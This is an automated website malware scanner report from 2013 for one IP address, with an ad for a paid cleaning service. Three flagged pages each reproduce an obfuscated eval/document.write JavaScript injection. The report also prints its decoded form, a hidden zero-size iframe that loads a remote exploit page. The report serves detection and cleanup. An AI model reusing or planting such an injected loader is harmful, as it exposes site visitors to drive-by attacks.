Online Malware Scanner report for 61.114.231.60

61.114.231.60

(cached results from Sun Jul 14 15:29:21 2013 rescan)

Website Malware
Cleaning & Monitoring

Malware cleaning service from eVuln team.

Website cleaning
Redirects removal
Log files inspection
Reason eliminating
Blacklists removal
One year monitoring
Repeated fixing

$119.00

Malicious/Suspicious/Total urls checked: 3/0/10

3 pages have malicious code. See details below

Blacklists: OK

Malicious redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Setup daily monitoring of 61.114.231.60

Paste the following HTML code anywhere into "61.114.231.60" website.

Scanned pages/files

Request	Server response	Status
http://61.114.231.60/	200 OK Content-Length: 18936 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2 ... 1297 bytes are skipped ...65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz64cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e"; yvDFQwwmM = eval; var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%"); yvDFQwwmM("document.write(unescape(WSxQJgvuB))"); Decoded script: document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB)) <iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe> Antivirus reports: Rising Hack.Exploit.Win32.HTML.Iframe.fir
http://61.114.231.60/mobile/index.html	200 OK Content-Length: 6940 Content-Type: text/html	clean
http://61.114.231.60/mobile/toritsugi.html	200 OK Content-Length: 2445 Content-Type: text/html	clean
http://61.114.231.60/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean
http://61.114.231.60/online/ubiq.html	200 OK Content-Length: 4399 Content-Type: text/html	clean
http://61.114.231.60/online/../index.html	200 OK Content-Length: 18936 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2 ... 1297 bytes are skipped ...65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz64cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e"; yvDFQwwmM = eval; var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%"); yvDFQwwmM("document.write(unescape(WSxQJgvuB))"); Decoded script: document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB)) <iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe> Antivirus reports: Rising Hack.Exploit.Win32.HTML.Iframe.fir
http://61.114.231.60/online/../mobile/index.html	200 OK Content-Length: 6940 Content-Type: text/html	clean
http://61.114.231.60/online/../mobile/toritsugi.html	200 OK Content-Length: 2445 Content-Type: text/html	clean
http://61.114.231.60/online/../online/ubiq.html	200 OK Content-Length: 4399 Content-Type: text/html	clean
http://61.114.231.60/online/../online/../index.html	200 OK Content-Length: 18936 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2 ... 1297 bytes are skipped ...65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz64cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e"; yvDFQwwmM = eval; var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%"); yvDFQwwmM("document.write(unescape(WSxQJgvuB))"); Decoded script: document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB)) <iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe> Antivirus reports: Rising Hack.Exploit.Win32.HTML.Iframe.fir

Malicious redirects

First query (normal visit):
GET / HTTP/1.1
Host: 61.114.231.60

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Jul 2013 12:29:23 GMT
Accept-Ranges: bytes
ETag: "10780c9-49f8-2799b80"
Server: Apache
Content-Length: 18936
Content-Type: text/html
Last-Modified: Fri, 12 Jul 2013 12:54:22 GMT

...18936 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: 61.114.231.60
Referer: http://www.google.com/search?q=61.114.231.60

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=61.114.231.60

Result: This site is not currently listed as suspicious.

Query: http://yandex.ru/infected?l10n=en&url=http://61.114.231.60/

Result: 61.114.231.60 is not infected or malware details are not published yet.

Online Malware Scanner report for 61.114.231.60

Website MalwareCleaning & Monitoring

Scanned pages/files

Malicious redirects

Safe Browsing / Blacklists

Website Malware
Cleaning & Monitoring